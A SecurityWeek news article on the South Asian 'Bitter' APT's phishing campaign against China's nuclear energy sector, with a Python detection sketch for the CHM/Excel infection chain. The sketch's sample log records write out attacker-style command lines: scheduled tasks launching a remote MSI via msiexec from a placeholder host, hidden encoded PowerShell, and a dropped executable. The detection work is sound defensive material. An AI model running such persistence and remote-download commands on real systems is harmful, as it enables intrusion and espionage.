SecurityWeek

China’s Nuclear Energy Sector Targeted in Cyberespionage Campaign

A South Asian espionage group named Bitter has been targeting the Chinese nuclear energy sector.

A South Asian advanced persistent threat (APT) actor has been targeting the nuclear energy sector in China in a recent cyberespionage campaign, Intezer reports.

Dubbed ‘Bitter’ and active since at least 2021, the group is known for targeting energy and government organizations in Bangladesh, China, Pakistan, and Saudi Arabia, and is characterized by its use of Excel exploits, Microsoft Compiled HTML Help (CHM) files, and Windows Installer (MSI) files.

Continuing to target Chinese organizations, the group used updated first-stage payloads in the recently observed espionage campaign, added an extra layer of obfuscation, and employed additional decoys for social engineering.

The Bitter APT targeted recipients in China’s nuclear energy industry with at least seven phishing emails impersonating the embassy of Kyrgyzstan in China, inviting them to join conferences on relevant subjects.

The recipients were lured into downloading and opening an attached RAR archive containing CHM or Excel payloads designed to achieve persistence and fetch additional malware from the command-and-control (C&C) server.

Observed Excel payloads contained an Equation Editor exploit designed to set a scheduled task to download a next-stage EXE file, and another task to execute the payload.

CHM files, on the other hand, can be used to execute arbitrary code with little user interaction, even when no vulnerable version of Microsoft Office is installed, and the Bitter APT used multiple such files in this campaign.

One of the identified variants creates a scheduled task to execute a remote MSI payload using msiexec. While investigating the attack chain, Intezer was only served empty MSI files, which the attackers could use for reconnaissance and which could be swapped with an actual payload if the target is deemed promising.


A second version of the CHM file was observed performing similar activity using an encoded PowerShell command stage.
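The chain described above leaves a recognizable trail in process-creation telemetry: the CHM viewer (hh.exe) or the Equation Editor (EQNEDT32.EXE) spawning schtasks.exe, a task action that points msiexec at a remote package, and an encoded PowerShell stage. The following detection sketch is an added example, not code from the Intezer report or from SecurityWeek; the log records, the URL (example.invalid) and the base64 string are constructed, and the field layout mirrors what Sysmon Event ID 1 or Windows 4688 records provide.

```python
import re

# Constructed sample process-creation records, not taken from the report.
# Each tuple is (parent_image, image, command_line). The base64 blob decodes
# to the harmless UTF-16LE command "Write-Output hi".
SAMPLE_EVENTS = [
    ("hh.exe", "schtasks.exe",
     'schtasks /create /sc minute /mo 15 /tn "Update" /tr "msiexec /q /i http://example.invalid/update.msi"'),
    ("hh.exe", "powershell.exe",
     "powershell.exe -nop -w hidden -EncodedCommand VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIABoAGkA"),
    ("EQNEDT32.EXE", "schtasks.exe",
     'schtasks /create /sc once /st 12:00 /tn "Sync" /tr "C:\\Users\\Public\\stage2.exe"'),
    ("explorer.exe", "msiexec.exe", "msiexec /i C:\\Installers\\vendor-tool.msi /qn"),
    ("svchost.exe", "powershell.exe", "powershell.exe -File C:\\Scripts\\inventory.ps1"),
]

# Document handlers that have no business creating scheduled tasks or
# launching script hosts: hh.exe renders CHM files, EQNEDT32.EXE is Equation Editor.
SUSPICIOUS_PARENTS = {"hh.exe", "eqnedt32.exe"}

# Each rule receives lower-cased (parent, image, command_line).
RULES = [
    ("schtasks_from_document_handler",
     lambda p, i, c: p in SUSPICIOUS_PARENTS and i == "schtasks.exe" and "/create" in c),
    ("msiexec_remote_package",  # msiexec installing straight from an http(s) URL
     lambda p, i, c: bool(re.search(r"msiexec(\.exe)?\s.*\s/i\s+https?://", c))),
    ("encoded_powershell_from_document_handler",
     lambda p, i, c: p in SUSPICIOUS_PARENTS and i == "powershell.exe"
                     and bool(re.search(r"\s-(enc|e|ec|encodedcommand)\s", c))),
]

def detect(events):
    """Return {event_index: [matched rule names]} for every event that trips a rule."""
    hits = {}
    for idx, (parent, image, cmdline) in enumerate(events):
        p, i, c = parent.lower(), image.lower(), cmdline.lower()
        matched = [name for name, pred in RULES if pred(p, i, c)]
        if matched:
            hits[idx] = matched
    return hits

if __name__ == "__main__":
    for idx, names in detect(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(names)} :: {SAMPLE_EVENTS[idx][2]}")
```

The two benign records (a local MSI install from explorer.exe and a file-based PowerShell script from svchost.exe) trip nothing, which is the point of keying the rules on the parent process rather than on msiexec or powershell.exe alone.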

“Bitter APT do not appear to change their tactics too much, therefore we can assume that the payloads will be similar to those observed in 2021, executing a downloader module that can be served with plugins such as a keylogger, remote access tool, file stealer, or browser credential stealer,” Intezer notes.

Related: New Espionage Group ‘YoroTrooper’ Targeting Entities in European, CIS Countries

Related: Microsoft: 17 European Nations Targeted by Russia in 2023 as Espionage Ramping Up

Related: Military Organizations in Pakistan Targeted With Sophisticated Espionage Tool

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
